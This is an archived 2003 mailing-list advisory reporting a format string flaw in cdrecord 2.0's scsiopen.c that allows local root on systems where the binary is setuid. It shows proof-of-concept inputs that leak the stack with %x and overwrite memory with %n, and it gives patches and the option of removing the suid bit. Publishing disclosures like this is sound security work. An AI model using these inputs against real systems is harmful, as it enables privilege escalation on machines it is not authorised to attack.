cdrtools2.0 Format String Vulnerability

From: Stefano Di Paola (st0r1eat_private)
Date: Tue May 13 2003 - 01:27:36 PDT

Next message: securityat_private: "Security Update: [CSSA-2003-021.0] OpenLinux: mgetty caller ID buffer overflow and spool perm vulnerabilities"

Previous message: millhouseat_private: "Re: Multiple Buffer Overflow Vulnerabilities Found in CMailServer 4.0"
In reply to: Marc Schoenefeld: "Opera 7.11 java.util.zip.* Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

----------------------------------------------------------------------------
PACKAGE           : cdrtools
VERSION           : 2.0 
SUMMARY           : Format String
SEVERITY          : local root exploit if suid (on several distros)
DATE:             : 2003-05-05
----------------------------------------------------------------------------


Hi,
i would inform you that there is a format string vulnerability
in cdrecord 2.0 and in particular in libscg/scsiopen.c in line 273, i
suppose:

--------------------------------------------------------------
   271          if (scg__open(scgp, devname) <= 0) {
   272                  if (errs && scgp->errstr)

>>>273                     js_snprintf(errs, slen, scgp->errstr);<<<<
   
   274                  scg_sfree(scgp);
   275                  return ((SCSI *)0);
   276          }
_______________________________________________________
!-------         W A R N I N G      -----------!  
!--- this  is an exploitable vulnerability! ---!
!----------------------------------------------!
Cdrecord is present in several distros as setuid program so this is a real
security hole.

e.g.
$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c

Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jrg Schilling
scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
scsibus: -2 target: -2 lun: -2
Warning: Open by 'devname' is unintentional and not supported.
./cdrecord: File o directory inesistente. Cannot open
'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242.
Cannot open SCSI driver.
./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you
are root.
as you can see th last %x refers to AAAABBBBCCC so i can use %n for
overwriting. anything i want:
e.g. i can find on the stack the location of the return address...
let's say 0xbffcffcc: 
$./cdrecord dev=`printf 
"\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"`
c/int.c
.....snip....
(core dump)
$ gdb   `which cdrecord`  core -q
....snip...
#0  0x3f in ?? ()
(gdb) bt
#0  0x3f in ?? ()
#1  0x8065451 in scg_open ()
#2  0x8049a3b in main ()
...

so it's exploitable.

Solutions:

A. Updated package can be found on:

	ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz

B. Replace line 273 of liscg/scsiopen.c with :
	 js_snprintf(errs, slen, "%s", scgp->errstr);

C. remove the suid bit with:
	chmod 755 `which cdrecord`



Regards,
Stefano Di Paola

------------------

Stefano Di Paola
Software Engineer
stefano.dipaola1<at>tin<dot>it
st0r1e<at>libero<dot>com

Next message: securityat_private: "Security Update: [CSSA-2003-021.0] OpenLinux: mgetty caller ID buffer overflow and spool perm vulnerabilities"
Previous message: millhouseat_private: "Re: Multiple Buffer Overflow Vulnerabilities Found in CMailServer 4.0"
In reply to: Marc Schoenefeld: "Opera 7.11 java.util.zip.* Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue May 13 2003 - 12:53:01 PDT